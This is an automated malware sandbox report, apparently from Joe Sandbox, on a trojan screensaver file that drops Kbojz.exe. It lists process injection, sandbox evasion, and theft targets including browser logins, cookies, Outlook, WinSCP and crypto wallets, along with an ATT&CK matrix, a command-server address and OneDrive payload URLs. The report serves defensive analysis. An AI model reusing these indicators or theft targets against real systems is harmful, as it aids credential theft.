                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory written: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory written: C:\Users\user\AppData\Roaming\Kbojz.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory written: C:\Users\user\AppData\Roaming\Kbojz.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrQueries volume information: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrQueries volume information: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeQueries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeQueries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeQueries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeQueries volume information: C:\Users\user\AppData\Roaming\Kbojz.exe VolumeInformation
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36451d0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.35e5190.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.35e5190.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Kbojz.exe.3db62b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36051b0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36451d0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36051b0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Kbojz.exe.3db62b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JwjpjAXX2iPkLxCgj32
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: Yara matchFile source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kbojz.exe PID: 3840, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36451d0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.46b0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.35e5190.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.35e5190.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Kbojz.exe.3db62b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36051b0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36451d0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kbojz.exe.36051b0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Kbojz.exe.3db62b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.7180000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts41
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    34
                    System Information Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    1
                    Install Root Certificate
                    Security Account Manager231
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder
                    1
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Clipboard Data
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets51
                    Virtualization/Sandbox Evasion
                    SSHKeylogging3
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                    Virtualization/Sandbox Evasion
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428798 Sample: UGS - CRO REQ - KHIDUBAI (O... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 5 other signatures 2->67 6 UGS - CRO REQ - KHIDUBAI (OPL-841724).scr 13 4 2->6         started        11 Kbojz.exe 2 2->11         started        13 Kbojz.exe 12 2 2->13         started        process3 dnsIp4 25 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49171, 49172 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 6->25 27 web.fe.1drv.com 6->27 33 5 other IPs or domains 6->33 23 C:\Users\user\AppData\Roaming\Kbojz.exe, PE32 6->23 dropped 69 Installs new ROOT certificates 6->69 71 Found many strings related to Crypto-Wallets (likely being stolen) 6->71 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 6->73 15 UGS - CRO REQ - KHIDUBAI (OPL-841724).scr 16 6->15         started        29 web.fe.1drv.com 11->29 35 5 other IPs or domains 11->35 75 Injects a PE file into a foreign processes 11->75 19 Kbojz.exe 11->19         started        31 web.fe.1drv.com 13->31 37 4 other IPs or domains 13->37 77 Antivirus detection for dropped file 13->77 79 Multi AV Scanner detection for dropped file 13->79 81 Machine Learning detection for dropped file 13->81 21 Kbojz.exe 13->21         started        file5 signatures6 process7 dnsIp8 39 80.85.152.161, 2442, 49174, 49176 CHELYABINSK-SIGNAL-ASRU Russian Federation 15->39 41 web.fe.1drv.com 15->41 47 11 other IPs or domains 15->47 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->51 53 Tries to steal Mail credentials (via file / registry access) 15->53 55 Found many strings related to Crypto-Wallets (likely being stolen) 15->55 43 dual-spov-0006.spov-dc-msedge.net 150.171.41.11, 443, 49184 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->43 45 web.fe.1drv.com 19->45 49 5 other IPs or domains 19->49 57 Tries to harvest and steal browser information (history, passwords, etc) 19->57 59 Tries to harvest and steal Bitcoin Wallet information 19->59 signatures9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    UGS - CRO REQ - KHIDUBAI (OPL-841724).scr64%ReversingLabsByteCode-MSIL.Trojan.Generic
                    UGS - CRO REQ - KHIDUBAI (OPL-841724).scr100%AviraHEUR/AGEN.1304549
                    UGS - CRO REQ - KHIDUBAI (OPL-841724).scr100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Kbojz.exe100%AviraHEUR/AGEN.1304549
                    C:\Users\user\AppData\Roaming\Kbojz.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Kbojz.exe64%ReversingLabsByteCode-MSIL.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://ocsp.entrust.net030%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    dual-spov-0006.spov-msedge.net
                    13.107.137.11
                    truefalse
                      unknown
                      dual-spov-0006.spov-dc-msedge.net
                      150.171.41.11
                      truefalse
                        unknown
                        public.am.files.1drv.com
                        unknown
                        unknownfalse
                          high
                          utqurw.am.files.1drv.com
                          unknown
                          unknownfalse
                            high
                            onedrive.live.com
                            unknown
                            unknownfalse
                              high
                              skydrive.live.com
                              unknown
                              unknownfalse
                                high
                                63.155.11.0.in-addr.arpa
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://onedrive.live.com/download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WEfalse
                                    high
                                    https://onedrive.live.com/download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-Afalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabOazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                          high
                                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3DwmfNtxfuk.tmpdb.6.drfalse
                                            high
